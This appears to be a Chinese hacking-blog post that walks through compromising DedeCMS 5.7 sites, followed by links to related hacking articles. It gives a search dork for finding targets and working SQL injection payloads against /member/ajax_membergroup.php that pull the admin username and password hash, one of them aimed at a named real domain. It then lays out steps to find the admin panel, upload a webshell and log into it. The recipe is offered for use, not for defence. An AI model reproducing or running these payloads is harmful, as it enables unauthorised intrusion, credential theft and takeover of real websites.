dedecms 版本漏洞

hacker4年前黑客文章1021

织网5.7的漏洞,可任意上传~

搜索关键词:Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc

访问/data/admin/ver.txt来查看cms

然后访问/member/ajax_membergroup.php?action=post&membergroup=1,出现"朋友 修改"即可注入

通过注入得到管理员帐号密码,搜后台,上传大马OK~提权还在学习阶段~

1

查看网站的版本

code 区域
cms /data/admin/ver.txt

2

查看是否有"朋友 修改",有则存在注入


code 区域
/member/ajax_membergroup.php?action=post&membergroup=1

3

帐号

code 区域
http://www.dzdyk.com /member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'`

4

去掉前三位和最后一位,得到管理员密码

code 区域
/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'`

5

扫后台,登录成功

6

后台页面

7

模块-文件管理器-文件上传 上传大马

8

登录webshell

标签: 黑客技术

相关文章

我们不一样的黑客渗透教程第六课,如何转发内网机器的端口?

我们不一样的黑客渗透教程第六课,如何转发内网机器的端口?

大家第六课讲了,怎样把内部网的的一台设备的端口转发出去,而且明确提出一个难题,假如内部网的一台设备上不了网,可否把它的端口转发出去?回答是能的,用EarthWorm或端口转发专用工具lcx都能够保证...

微软公司的“程序运行控制方法”:AppLocker,管理人员

微软公司的“程序运行控制方法”:AppLocker,管理人员

微软公司的“程序运行控制方法”:AppLocker,管理人员能够十分便捷地开展配备,以操纵客户能够在电子计算机上可运作什么程序流程、安裝什么文档、运作什么脚本制作?网络黑客假如能绕开AppLocke...

XSS技术专业表述

XSS技术专业表述

先给大伙说一下XSS的技术专业表述吧!   什么叫XSS进攻? 每每程序运行的新网页页面中包括不会受到信赖的、未历经适当认证或转义的数据信息,或是应用能够建立JavaScript 的电脑浏...

织梦dedecms管理系统后台查找技巧

有时在通过注射得到织梦程序的管理密码时,却发现找不到后台地址。这样让大家很是蛋疼,下面我来介绍几种织梦系统找后台的方法。 织梦dedecms管理系统后台查找技巧 这个时候大家可以尝试下在地址...

记一次绕过垃圾防注入系统过程

记一次绕过垃圾防注入系统过程

今天无聊在帮一个站做渗透测试的时候,旁注找到一个asp企业站,asp好站拿点嘛,所以还是非常开心的,其中一个asp站,有这样的链接: http://www.xxx.cn/news_list....

如何成为一名黑客 什么啊什么Q 2018  可以教你成为一名黑客的书

原文地址: http://fsecurify.com/how-to-learn-hacking/ 如何学习黑客技术?   这个问题我几乎每天都会在Quora、Facebook、Twitter和现实生活...